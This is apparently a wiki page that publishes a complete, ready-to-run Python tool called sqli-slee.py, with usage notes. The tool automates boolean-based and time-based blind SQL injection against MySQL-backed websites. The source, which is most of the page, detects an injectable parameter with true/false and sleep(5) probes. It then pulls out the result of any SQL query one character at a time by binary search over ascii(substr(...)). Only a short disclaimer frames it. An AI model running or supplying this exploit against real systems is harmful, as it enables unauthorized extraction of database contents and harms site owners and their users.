
Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{info|<center>This script uses time and boolean based blind [[SQL injection]] to obtain the desired information from MySQL database.</center>}}
+
{{info|<center>This [[python]] script uses time and [[boolean enumeration|boolean]] based blind [[SQL injection]] to obtain the desired information from [[MySQL]] [[database]]s.</center>}}
 +
 
 +
<font size="-2">Special thanks to [[User:Dilon|Dilon]] for this tool.</font>
  
 
=Info=
 
=Info=
 +
{{main|mysqli-blindutils}}
 
The syntax of this script is:
 
The syntax of this script is:
 
   python sqli-slee.py -u [url] -i [injection]
 
   python sqli-slee.py -u [url] -i [injection]

Latest revision as of 02:57, 21 November 2012

This Python script uses time-based and boolean-based blind SQL injection to extract the result of a SQL expression from a MySQL database one character at a time, using either the response length or a `sleep()` delay as the oracle.

Special thanks to Dilon for this tool.

Info

Main article: mysqli-blindutils

The syntax of this script is (the URL passed to `-u` must already contain the injection point, including any quote needed to break out of the original query's string literal — the script only appends `and ...` clauses to it):

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

The end user is liable for his or her own actions when using this software. Running it against a system you do not own, without written authorization, is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import re
import socket
import string
import sys
import time
import urllib2
from optparse import OptionParser
from urllib2 import HTTPError, Request, URLError, urlopen
 
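def request(URL, timeout=None):
    """Fetch URL with a browser-like User-Agent and return the body length in bytes.

    The byte length of the response body is the only signal the boolean oracle
    uses (see vuln_check/is_what), so the body content itself is discarded.

    Args:
        URL: fully built request URL (the injection is already appended by the caller).
        timeout: seconds to wait for connect/read. None keeps urllib2's default,
            which blocks indefinitely on a stalled connection. When set, it must
            be comfortably larger than any sleep() a time-based probe measures.

    Returns:
        int: number of bytes in the response body.

    Exits the process with status 1 on an HTTP error status, an unreachable host,
    or a timeout. Note that a server answering the broken/"false" condition with
    an HTTP 500 is itself a very common boolean oracle; this tool does not exploit
    that and bails out instead.
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'}
    req = urllib2.Request(URL, None, headers)

    resp = None
    try:
        if timeout is None:
            resp = urllib2.urlopen(req)
        else:
            resp = urllib2.urlopen(req, timeout=timeout)
        return len(resp.read())

    except HTTPError as e:
        # HTTPError subclasses URLError, so it has to be caught first.
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)

    except URLError as e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)

    except socket.timeout:
        # A timeout during read() is raised as socket.timeout, not URLError.
        print('[!] Request timed out after ' + str(timeout) + 's.')
        sys.exit(1)

    finally:
        # Always release the connection, including on the exit paths above.
        if resp is not None:
            resp.close()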
 
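def value(URL):
    """Recover one character through the oracle; return chr(code) or 'done'.

    URL already selects the character (``... ascii(substr(<injection> from N for 1))``);
    is_what() appends a comparison operator and a candidate code to it.

    Search: start at 127 and move by a halving step (64, 32, ..., 1) toward the
    side the oracle reports, asking '>' then '<' then '=' at each round. The step
    reaches 0 after eight moves, so the loop is capped at 9 rounds and exhausting
    it yields 'done'. That is how the end of the string is detected: MySQL's
    ascii('') is 0, and code 0 is never reached by the '=' test. Code 255 is
    equally unreachable, so a 0xFF byte also terminates the dump. If the oracle
    answers "false" to all three comparisons in a round (e.g. a time-based probe
    whose delay was lost to jitter) the same candidate is retried next round.

    Returns:
        str: the recovered character, or 'done' when no code was confirmed.
    """
    floor = 0
    ceiling = 255
    # Integer division: the candidate is sent verbatim in the URL, so it must
    # never become a float (under Python 3 '/' would yield 127.5).
    maybe = ceiling // 2
    next_maybe = maybe

    for _ in range(9):
        if is_what(URL, maybe, '>'):
            floor = maybe
            next_maybe = maybe + (ceiling - floor) // 2

        elif is_what(URL, maybe, '<'):
            ceiling = maybe
            next_maybe = maybe - (ceiling - floor) // 2

        elif is_what(URL, maybe, '='):
            return chr(maybe)

        maybe = next_maybe

    return 'done'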
 
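def is_what(URL, maybe, op):
    """Ask the oracle whether ``ascii(<char>) <op> <maybe>`` holds; return 1 or 0.

    Reads the module globals set by vuln_check(): sqli_type selects the oracle
    and TrueResponse is the body length of a known-true condition.

    boolean: sends ``URL<op><maybe>--+`` and reports 1 iff the body length equals
        TrueResponse. A page whose length varies between requests (timestamps,
        rotating content) therefore produces wrong answers; nothing re-checks
        this per request.
    time: sends ``URL<op><maybe>)*2)--+``, which closes the ``sleep((...)*2)``
        opened by main(), so a true comparison sleeps 2 s. Reports 1 iff the
        round trip took longer than 2 s — network latency above 2 s is read as
        "true", and a lost delay is read as "false".

    The operator is percent-encoded: raw '<' and '>' are not valid in a URL and
    some servers reject them with 400, which request() turns into an exit.

    Returns:
        int: 1 (true) or 0 (false); None if sqli_type is neither mode, which
        vuln_check() never produces.
    """
    probe = str(URL) + urllib2.quote(str(op)) + str(maybe)

    if sqli_type == 'boolean':
        body_len = int(request(probe + '--+'))
        return 1 if body_len == TrueResponse else 0

    if sqli_type == 'time':
        started = time.time()
        request(probe + ')*2)--+')
        return 1 if (time.time() - started) > 2 else 0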
 
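def vuln_check(URL):
    """Probe URL for a usable blind-SQLi oracle and return 'boolean' or 'time'.

    Sets the module global TrueResponse (body length of a known-true condition)
    that is_what() compares against in boolean mode.

    1. boolean: ``AND 43 like 43`` versus ``AND 34 like 43``. The page is only a
       trustworthy oracle if the true condition returns the same length twice
       (otherwise dynamic content, not the injection, explains any difference)
       and the false condition returns a different length.
    2. time: ``and sleep(5)`` must make the round trip exceed 5 s. No baseline
       latency is subtracted, so a very slow server can look vulnerable.

    Exits with status 1 when neither probe responds (request() also exits on
    any HTTP error, so a server that answers the broken condition with a 500 is
    reported as a failure rather than as an oracle).
    """
    print('[+] Checking site...')

    global TrueResponse
    true_probe = URL + '%20AND%2043%20like%2043--+'
    TrueResponse = int(request(true_probe))
    # Second identical request: if the length moved, the page is dynamic and a
    # length-based oracle would give arbitrary answers.
    stable = int(request(true_probe)) == TrueResponse
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))

    if stable and TrueResponse != FalseResponse:
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    if not stable:
        print('[!] Page length varies between identical requests; skipping boolean check.')

    start = time.time()
    request(URL + '%20and%20sleep(5)--+')
    elapsed_time = time.time() - start

    if elapsed_time > 5:
        print('[+] Site seems to be vulnerable to time based blind SQL injection.')
        return 'time'

    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
    sys.exit(1)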
 
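def main():
    """CLI entry point: detect the oracle, then dump the result of -i one byte at a time.

    -u  target URL including the injection point (e.g. the trailing %27 that
        closes the original string literal); everything this tool sends is
        appended to it as ``and ...`` clauses.
    -i  SQL expression whose result is extracted; it is percent-encoded here.

    Each character costs several requests (see value()). The dump stops when
    value() returns 'done', which happens once substr() runs past the end of
    the result (ascii('') is 0 in MySQL) or the oracle stops confirming a code.
    """
    print('''
                Auto BSQLi tool for MySQL
                ''')

    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')

    (options, args) = parser.parse_args()
    if not (options.URL and options.INJECTION):
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)

    URL = options.URL
    # NOTE(review): under Python 2 argv entries are byte strings and
    # str.encode('utf8') first decodes them as ASCII, so a non-ASCII injection
    # raises UnicodeDecodeError here; plain ASCII SQL is unaffected.
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))

    global sqli_type
    sqli_type = vuln_check(URL)
    print('[+] Dumping data...')

    chars = []
    position = 1
    while True:
        letter = value(_char_probe(URL, INJECTION, position))
        if letter == 'done':
            break
        chars.append(letter)
        position += 1

    dump = ''.join(chars)
    if dump:
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')


def _char_probe(URL, INJECTION, position):
    """Build the URL that selects character *position* of INJECTION's result.

    Both forms leave the comparison open: is_what() appends the operator, the
    candidate code and the closing ``--+`` (plus ``)*2)`` in time mode, which
    closes ``sleep((...)*2)`` so a true comparison sleeps 2 s). Reads the
    module global sqli_type; anything other than 'time' gets the boolean form.
    """
    selector = 'ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))'
    if sqli_type == 'time':
        return URL + '%20and%20sleep((select%20' + selector
    return URL + '%20and%20' + selector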
 
# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    main()